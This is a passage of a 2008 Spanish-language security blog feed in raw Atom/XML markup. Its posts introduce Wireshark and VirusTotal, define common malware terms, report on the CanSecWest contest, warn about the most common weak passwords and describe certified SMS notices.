href="http://3.bp.blogspot.com/_nams9blykQY/R9XiBGXLK0I/AAAAAAAAAEI/uhVpQ9vnyO4/s1600-h/ventanaopciones.jpg"&gt;&lt;img style="cursor: pointer;" src="http://3.bp.blogspot.com/_nams9blykQY/R9XiBGXLK0I/AAAAAAAAAEI/uhVpQ9vnyO4/s320/ventanaopciones.jpg" alt="" id="BLOGGER_PHOTO_ID_5176291855247813442" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;Acá podemos determinar también, con que placa se va a realizar el escaneo, como así también si queremos colocar algun filtro de paquetes, en que archivo se va a guardar los datos capturados, y otra serie de opciones bastante interesantes para investigar.&lt;br /&gt;&lt;br /&gt;Pero con esto les va a servir como para arrancar a mirarlo, porque lo poco que estuve viendo y leyendo tiene un gran potencial y puede ser utilizado como herramienta para auditorias informáticas.&lt;br /&gt;Solo queda en uds. postear lo que vayan aprendiendo, porque el conocimiento es de todos y para todos.&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-8309938445693304583?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/8309938445693304583/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=8309938445693304583&amp;isPopup=true' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/8309938445693304583'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/8309938445693304583'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2008/03/instalando-y-ejecutando-wireshark.html' title='Instalando y Ejecutando Wireshark'/><author><name>Barnisimo</name><uri>http://www.blogger.com/profile/01972106911791737364</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_nams9blykQY/R9XZDGXLKrI/AAAAAAAAADA/PQYHTivm4pI/s72-c/ventanainicio.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-4631534809622542672</id><published>2008-03-10T22:27:00.005-02:00</published><updated>2008-12-10T12:33:54.902-02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Herramientas'/><title type='text'>Una Herramienta para Sniffing</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_nams9blykQY/R9XUpGXLKqI/AAAAAAAAAC4/5EHU8BTy0yI/s1600-h/200px-Wireshark_Icon.svg.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://3.bp.blogspot.com/_nams9blykQY/R9XUpGXLKqI/AAAAAAAAAC4/5EHU8BTy0yI/s320/200px-Wireshark_Icon.svg.png" alt="" id="BLOGGER_PHOTO_ID_5176277149279791778" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;b&gt;Wireshark&lt;/b&gt;, antes conocido como Ethereal, es un &lt;a href="http://es.wikipedia.org/wiki/Analizador_de_protocolos" title="Analizador de protocolos"&gt;analizador de protocolos&lt;/a&gt; utilizado para realizar análisis y solucionar problemas en redes de comunicaciones para desarrollo de &lt;a href="http://es.wikipedia.org/wiki/Software" title="Software"&gt;software&lt;/a&gt; y &lt;a href="http://es.wikipedia.org/wiki/Protocolo" title="Protocolo"&gt;protocolos&lt;/a&gt;, y como una herramienta didáctica para educación. Cuenta con todas las características estándar de un analizador de protocolos. &lt;p style="text-align: justify;"&gt;La funcionalidad que provee es similar a la de &lt;a href="http://es.wikipedia.org/wiki/Tcpdump" title="Tcpdump"&gt;tcpdump&lt;/a&gt;, pero añade una &lt;a href="http://es.wikipedia.org/wiki/Interfaz_gr%C3%A1fica" class="mw-redirect" title="Interfaz gráfica"&gt;interfaz gráfica&lt;/a&gt; y muchas opciones de organización y filtrado de información. Así, permite ver todo el tráfico que pasa a través de una red (usualmente una red &lt;a href="http://es.wikipedia.org/wiki/Ethernet" title="Ethernet"&gt;Ethernet&lt;/a&gt;, aunque es compatible con algunas otras) estableciendo la configuración en modo promiscuo. También incluye una versión basada en texto llamada tshark.&lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt;Permite examinar datos de una red viva o de un archivo de captura salvado en disco. Se puede analizar la información capturada, a través de los detalles y sumarios por cada paquete. Wireshark incluye un completo lenguaje para filtrar lo que queremos ver y la habilidad de mostrar el flujo reconstruido de una sesión de TCP.&lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt;Wireshark es &lt;a href="http://es.wikipedia.org/wiki/Software_libre" title="Software libre"&gt;software libre&lt;/a&gt;, y se ejecuta sobre la mayoría de sistemas operativos Unix y compatibles, incluyendo &lt;a href="http://es.wikipedia.org/wiki/Linux" title="Linux"&gt;Linux&lt;/a&gt;, &lt;a href="http://es.wikipedia.org/wiki/Solaris" title="Solaris"&gt;Solaris&lt;/a&gt;, &lt;a href="http://es.wikipedia.org/wiki/FreeBSD" title="FreeBSD"&gt;FreeBSD&lt;/a&gt;, &lt;a href="http://es.wikipedia.org/wiki/NetBSD" title="NetBSD"&gt;NetBSD&lt;/a&gt;, &lt;a href="http://es.wikipedia.org/wiki/OpenBSD" title="OpenBSD"&gt;OpenBSD&lt;/a&gt;, y &lt;a href="http://es.wikipedia.org/wiki/Mac_OS_X" title="Mac OS X"&gt;Mac OS X&lt;/a&gt;, así como en &lt;a href="http://es.wikipedia.org/wiki/Microsoft_Windows" title="Microsoft Windows"&gt;Microsoft Windows&lt;/a&gt;.   &lt;br /&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-4631534809622542672?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/4631534809622542672/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=4631534809622542672&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/4631534809622542672'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/4631534809622542672'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2008/03/una-herramienta-para-sniffing.html' title='Una Herramienta para Sniffing'/><author><name>Barnisimo</name><uri>http://www.blogger.com/profile/01972106911791737364</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_nams9blykQY/R9XUpGXLKqI/AAAAAAAAAC4/5EHU8BTy0yI/s72-c/200px-Wireshark_Icon.svg.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-6147348923710402475</id><published>2008-02-11T12:37:00.000-02:00</published><updated>2008-02-11T12:47:26.944-02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Herramientas'/><title type='text'>Virus Total</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.virustotal.com/img/VirusTotal-logo.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px;" src="http://www.virustotal.com/img/VirusTotal-logo.png" alt="" border="0" /&gt;&lt;/a&gt;En esta oportunidad les quería recomendar un servicio propuesto por la gente de &lt;a href="http://http://www.hispasec.com/"&gt;&lt;span style="font-weight: bold;"&gt;Hispasec&lt;/span&gt;&lt;/a&gt;. Se trata de un analizador de Archivos sospechosos que nos permite detectar virus, troyanos, gusanos y malwares en general.&lt;br /&gt;&lt;br /&gt;Como característica fundamental encontramos:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Servicio independiente y GRATUITO.&lt;/li&gt;&lt;li&gt;Uso simultáneo de múltiples motores antivirus.&lt;/li&gt;&lt;li&gt;Actualización automática de motores antivurus en tiempo real.&lt;/li&gt;&lt;li&gt;Resultado detallado de cada antivirus.&lt;/li&gt;&lt;li&gt;Estadísticas globales en tiempo real.&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;Como funciona esto? Es muy simple, si sospechas de algún archivo entonces es posible analizarlo, entrando al sitio de esta herramienta &lt;a href="http://www.virustotal.com/es/"&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;Virus Total&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;, te vas a encontrar con un cuadro de texto para subir el archivo sospechado y al instante comenzará a analizar el mismo.&lt;br /&gt;&lt;br /&gt;Te lo recomendamos para que lo pruebes y hagas uso de esta herramienta gratuita y en línea.&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-6147348923710402475?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/6147348923710402475/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=6147348923710402475&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/6147348923710402475'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/6147348923710402475'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2008/02/virus-total.html' title='Virus Total'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-5262868903453409426</id><published>2008-02-10T22:58:00.000-02:00</published><updated>2008-12-10T12:33:55.095-02:00</updated><title type='text'>Algunas definiciones interesantes</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_nams9blykQY/R6-gu6oVY9I/AAAAAAAAACg/e3j19qWxHw4/s1600-h/definiciones.jpg"&gt;&lt;img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;" src="http://2.bp.blogspot.com/_nams9blykQY/R6-gu6oVY9I/AAAAAAAAACg/e3j19qWxHw4/s320/definiciones.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5165524025490105298" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;strong&gt;Antivirus&lt;/strong&gt;&lt;br /&gt;Los antivirus son programas cuya función es detectar y eliminar virus informáticos y otros programas maliciosos (a veces denominados malware). &lt;br /&gt;Un virus informático es un programa que se copia automáticamente y que tiene por objeto alterar el funcionamiento de la computadora, sin el permiso o el conocimiento del usuario.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Bots&lt;/strong&gt;&lt;br /&gt;Un bot (diminutivo de robot) es un programa informático que realiza muy diversas funciones imitando a los humanos. Pueden abrir cuentas en sitios de correo electrónico gratuito, por lo que ahora la mayoría de esos sitios cuenta con un paso adicional en el que el usuario debe escribir una palabra presentada en formato gráfico; algo muy difícil de interpretar para un bot ya que no reconoce el texto contenido en una imagen.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Gusano&lt;/strong&gt;&lt;br /&gt;Es un virus o programa que se auto replica, no altera los archivos, sino que reside en la memoria y se duplica a sí mismo. Los gusanos utilizan las partes automáticas de un sistema operativo que&lt;br /&gt;generalmente son invisibles al usuario.&lt;br /&gt;Es algo usual detectar la presencia de gusanos en un sistema cuando, debido a su incontrolada replicación, los recursos del sistema se consumen hasta el punto de que las tareas ordinarias del mismo son excesivamente lentas o simplemente no pueden ejecutarse.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Malware&lt;/strong&gt;&lt;br /&gt;La palabra malware proviene de una agrupación de las palabras (malicious&lt;br /&gt;software). Este programa o archivo, que es dañino para el ordenador, está&lt;br /&gt;diseñado para insertar virus, gusanos, troyanos, spyware o incluso los bots,&lt;br /&gt;intentando conseguir algún objetivo, como podría ser el de recoger información&lt;br /&gt;sobre el usuario o sobre el ordenador en sí.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Phishing&lt;/strong&gt;&lt;br /&gt;Phishing es un término utilizado en informática con el cual se denomina el uso de un tipo de ingeniería social, caracterizado por intentar adquirir información confidencial de forma fraudulenta, como puede ser una contraseña o información detallada sobre tarjetas de crédito u otra información bancaria. El estafador, mejor conocido como phisher se hace pasar por una persona o empresa de confianza en una aparente comunicación oficial electrónica, por lo común un correo electrónico o algún sistema de mensajería instantánea.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Rootkit&lt;/strong&gt;&lt;br /&gt;Un rootkit es una herramienta, o un grupo de ellas usadas para esconder los procesos y archivos que permiten al intruso mantener el acceso al sistema, a menudo con fines maliciosos.&lt;br /&gt;Un rootkit oculta inicios de sesión, procesos, archivos y registros. Puede incluir software para interceptar datos procedentes de terminales, conexiones de red e incluso el teclado. Los rootkits son habitualmente considerados troyanos.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Spam&lt;/strong&gt;&lt;br /&gt;Spam son mensajes no solicitados, habitualmente de tipo publicitario, enviados en cantidades masivas, y que buscan un beneficio a nivel personal o corporativo. Aunque se puede hacer por distintas vías, la más utilizada entre el público en general es la basada en el correo electrónico. El spam también puede tener como objetivo los teléfonos móviles y los sistemas de mensajería instantánea. En España el spam está terminantemente prohibido por la Ley de Servicios de&lt;br /&gt;&lt;p&gt;la Sociedad de la Información y de Comercio Electrónico, publicada en el BOE del 12 de julio de 2002. Aparte, a los poseedores de bases de datos de correos electrónicos se les podría aplicar la Ley Orgánica de Protección de Datos por tratarse de datos de carácter personal. De hecho, las sentencias en España referidas al spam están relacionadas con esta ley.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Spyware&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;Los programas espía o spyware son aplicaciones que recopilan información sobre una persona u organización sin su conocimiento. La función más común que tienen estos programas es la de recopilar información sobre el usuario y distribuirlo a empresas publicitarias. Además pueden servir para enviar a los  suarios a sitios de Internet que tienen la imagen corporativa de otros, con el objetivo de obtener información importante.&lt;/p&gt;&lt;strong&gt;Troyano&lt;/strong&gt;&lt;br /&gt;Se denomina troyano a un programa malicioso capaz de alojarse en computadoras y permitir el acceso a usuarios externos, a través de una red local o de Internet, con el fin de recabar información o controlar remotamente a la máquina anfitriona, pero sin afectar al funcionamiento de ésta. La diferencia fundamental entre un troyano y un virus consiste en su finalidad.&lt;br /&gt;Para que un programa sea un "troyano" solo tiene que acceder y controlar la máquina anfitriona sin ser advertido. Al contrario que un virus, que es un huésped destructivo, el troyano evita provocar daños porque no es su objetivo. &lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-5262868903453409426?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/5262868903453409426/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=5262868903453409426&amp;isPopup=true' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/5262868903453409426'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/5262868903453409426'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2008/02/algunas-definiciones-interesantes.html' title='Algunas definiciones interesantes'/><author><name>Barnisimo</name><uri>http://www.blogger.com/profile/01972106911791737364</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_nams9blykQY/R6-gu6oVY9I/AAAAAAAAACg/e3j19qWxHw4/s72-c/definiciones.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-6814732381144481690</id><published>2008-02-10T22:39:00.000-02:00</published><updated>2008-02-10T22:42:03.550-02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Un grupo de hackers decidirá cuál es el SO más seguro</title><content type='html'>&lt;span style="font-weight: bold;"&gt;Windows&lt;/span&gt;, &lt;span style="font-weight: bold;"&gt;Linux&lt;/span&gt; y &lt;span style="font-weight: bold;"&gt;Apple&lt;/span&gt; se someterán al examen de los hackers, que participarán en un concurso para probar su seguridad.&lt;br /&gt;&lt;br /&gt;El congreso &lt;span style="font-weight: bold; font-style: italic;"&gt;CanSecWest&lt;/span&gt;, que cada año reúne a los mejores hackers del planeta tratará de determinar en su edición de 2008, que se celebrará en Vancouver entre el 26 y el 27 de marzo, cuál es el sistema operativo menos vulnerable.&lt;br /&gt;&lt;br /&gt;Según el organizador del evento, Dragos Ruiu, el evento permitirá conocer qué sistema es más seguro entre el Leopard X, de Apple, Vista, de Windows, y una versión aún por determinar de Linux. “La idea se nos ocurrió porque es difícil saber la verdad”, asegura Ruiu, que critica el desconcierto que existe entre la propaganda que producen los seguidores de cada uno de los tres sistemas operativos.&lt;br /&gt;&lt;br /&gt;En su anterior edición, este congreso de “hacktivismo ético” fue el escenario del primer hackeo del MacBook Pro, que reportó un premio de 10.000 dólares al ganador.  Más información en &lt;a href="http://www.silicon.fr/fr/news/2008/02/08/linux__vista_et_mac_sous_la_loupe_des_hackers"&gt;Silicon.fr&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-6814732381144481690?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/6814732381144481690/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=6814732381144481690&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/6814732381144481690'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/6814732381144481690'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2008/02/un-grupo-de-hackers-decidir-cul-es-el.html' title='Un grupo de hackers decidirá cuál es el SO más seguro'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-4669474654901733412</id><published>2008-02-10T22:38:00.000-02:00</published><updated>2008-12-10T12:33:55.330-02:00</updated><title type='text'>LOS 10 PASSWORD MÁS USADOS EN EL MUNDO</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_nams9blykQY/R6-bz6oVY8I/AAAAAAAAACY/R_ERfAIgJjk/s1600-h/hackers.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://2.bp.blogspot.com/_nams9blykQY/R6-bz6oVY8I/AAAAAAAAACY/R_ERfAIgJjk/s320/hackers.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5165518613831312322" /&gt;&lt;/a&gt;Los internautas no tenemos demasiado cuidado en la elección de nuestras contraseñas; es lo que se extrae de lo que publica Steve Johnson en Chicago Tribune, un listado de las diez claves de acceso más comunes en la red que deja mucho que desear en cuanto a seguridad se refiere.&lt;br /&gt;&lt;br /&gt;Con contraseñas como "password", "123456", "qwerty" o "abc123", muchos "piratas" informáticos deben estar encantados de poder acceder a cuentas de correo, páginas privadas y contenidos poco protegidos.&lt;br /&gt;&lt;br /&gt;El "top ten" de la imprudencia&lt;br /&gt;&lt;br /&gt;1. password&lt;br /&gt;2. 123456&lt;br /&gt;3. qwerty&lt;br /&gt;4. abc123&lt;br /&gt;5. letmein&lt;br /&gt;6. monkey&lt;br /&gt;7. myspace1&lt;br /&gt;8. password1&lt;br /&gt;9. blink182&lt;br /&gt;10. (tu nombre) &lt;br /&gt;&lt;br /&gt;Hasta ponen ejemplo: por una contraseña aleatoria de seis caracteres se tardan unos cinco minutos en dar con la clave; si se combinan las mayúsculas y las minúsculas se amplía el tiempo a más de ocho días.&lt;br /&gt;&lt;br /&gt;Si además suele utilizar las contraseñas para varios sitios, puede tener un serio problema; pero no se apure, en la propia red se pueden obtener gestores de contraseñas mucho más seguros, y otros consejos que le ayudarán a mantener a buen recaudo su privacidad.&lt;br /&gt;&lt;br /&gt;La lista no es muy diferente a la publicada el año pasado por la página alemana para buscar amistades y pareja FlirtLife, que detectó que de un total de 100.000 passwords de sus clientes, un 1,4 por ciento correspondía a la secuencia 123456 y un 2,5 por ciento comenzaba con 1234.&lt;br /&gt;&lt;br /&gt;Además, otras palabras que se repetían con frecuencia eran hello, password, baby y Frankfurt. Como consecuencia de este descubrimiento, el portal decidió enviar un mail de advertencia a todos los usuarios, alertándolos de que estaba en peligro la privacidad de su información.&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-4669474654901733412?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/4669474654901733412/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=4669474654901733412&amp;isPopup=true' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/4669474654901733412'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/4669474654901733412'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2008/02/los-10-password-ms-usados-en-el-mundo.html' title='LOS 10 PASSWORD MÁS USADOS EN EL MUNDO'/><author><name>Barnisimo</name><uri>http://www.blogger.com/profile/01972106911791737364</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_nams9blykQY/R6-bz6oVY8I/AAAAAAAAACY/R_ERfAIgJjk/s72-c/hackers.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-2011277931215156031</id><published>2008-02-06T15:32:00.000-02:00</published><updated>2008-02-06T15:34:50.345-02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Llegan los SMS certificados</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.auronix.com.mx/materiales/sms_gruppe.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 254px; height: 182px;" src="http://www.auronix.com.mx/materiales/sms_gruppe.jpg" alt="" border="0" /&gt;&lt;/a&gt;El Ayuntamiento de Lleida ha puesto en marcha el primer servicio de mensajes de texto (SMS) certificados, de modo que podrá comunicar notificaciones oficiales con validez legal a los ciudadanos a través del telófono móvil.&lt;br /&gt;&lt;br /&gt;(Servimedia) "Creemos en el papel de las Administraciones Públicas como impulsor de la sociedad del conocimiento", afirmó en rueda de prensa el alcalde de Lleida, Angel Ros, tras recordar que en 2010 los poderes públicos deberán cumplir con las exigencias de la Ley de Acceso Electrónico a la Administración.&lt;br /&gt;&lt;br /&gt;Además de la simplificación burocrática, otra de las bazas para el Ayuntamiento, según explicó el alcalde, es que permitirá que los funcionarios que ahora se encargan de enviar notificaciones certificadas se dediquen a otros cometidos.&lt;br /&gt;&lt;br /&gt;La empresa que ha creado y patentado el proyecto "SMS Certificado" es Lleida.net, una compañía con 20 empleados especializada en envío de mensajes de texto. Una de sus principales fuentes de ingresos son los partidos políticos, que la contratan para realizar envíos masivos de SMS.&lt;br /&gt;&lt;br /&gt;El presidente de Lleida.net, Sisco Sapena, explicó que el objetivo de facturación de este servicio para su primer año de funcionamiento es de un millón de euros y que la inversión inicial ha sido de 500.000 euros. El precio del envío de un SMS es de 60 céntimos de euro.&lt;br /&gt;Automático, rápido y ecológico&lt;br /&gt;&lt;br /&gt;"La certificación es muy rápida y todo el proceso dura unos segundos. Además, permite envíos automatizados a varios miles de destinatarios, y resulta ecológico porque no utiliza ni papel ni tinta en el proceso", apuntó.&lt;br /&gt;&lt;br /&gt;El procedimiento para enviar un SMS certificado consiste en que el usuario -en este caso, el Ayuntamiento de Lleida- envía un SMS a través de Internet, de modo que el mensaje llega a través de la interconexión con un operador móvil.&lt;br /&gt;&lt;br /&gt;Después, Lleida.net envía el acuse de recibo a través de Internet a la Autoridad de Certificación para "estampar" digitalmente el sello oficial. Por último, el acuse de recibo es enviado por "e-mail" al usuario, que lo puede utilizar con carácter de prueba antes terceros.&lt;br /&gt;&lt;br /&gt;Según afirmó Sapena, otros municipios españoles y europeos (el servicio es válido para la UE) están "muy interesados" en implantar el "SMS Certificado", de modo que se empezará a utilizar en otras localidades "de forma inminente". También apuntó que hay varias compañías europeas y estadounidenses interesadas en comprar la patente, aunque eludió dar nombres.&lt;br /&gt;&lt;br /&gt;De momento, el Ayuntamiento de Lleida ha comenzado a aplicar este servicio para procedimientos relacionados con temas de urbanismo, oposiciones, subvenciones y convocatorias públicas.&lt;br /&gt;&lt;br /&gt;Artículo completo &lt;a href="http://hispamp3.com/noticias/noticia.php?noticia=20080206180313"&gt;HispaMP3&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-2011277931215156031?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/2011277931215156031/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=2011277931215156031&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/2011277931215156031'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/2011277931215156031'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2008/02/llegan-los-sms-certificados.html' title='Llegan los SMS certificados'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-3093253315449895777</id><published>2008-01-31T14:40:00.000-02:00</published><updated>2008-12-10T12:33:55.612-02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Ejecución remota de código en BitTorrent 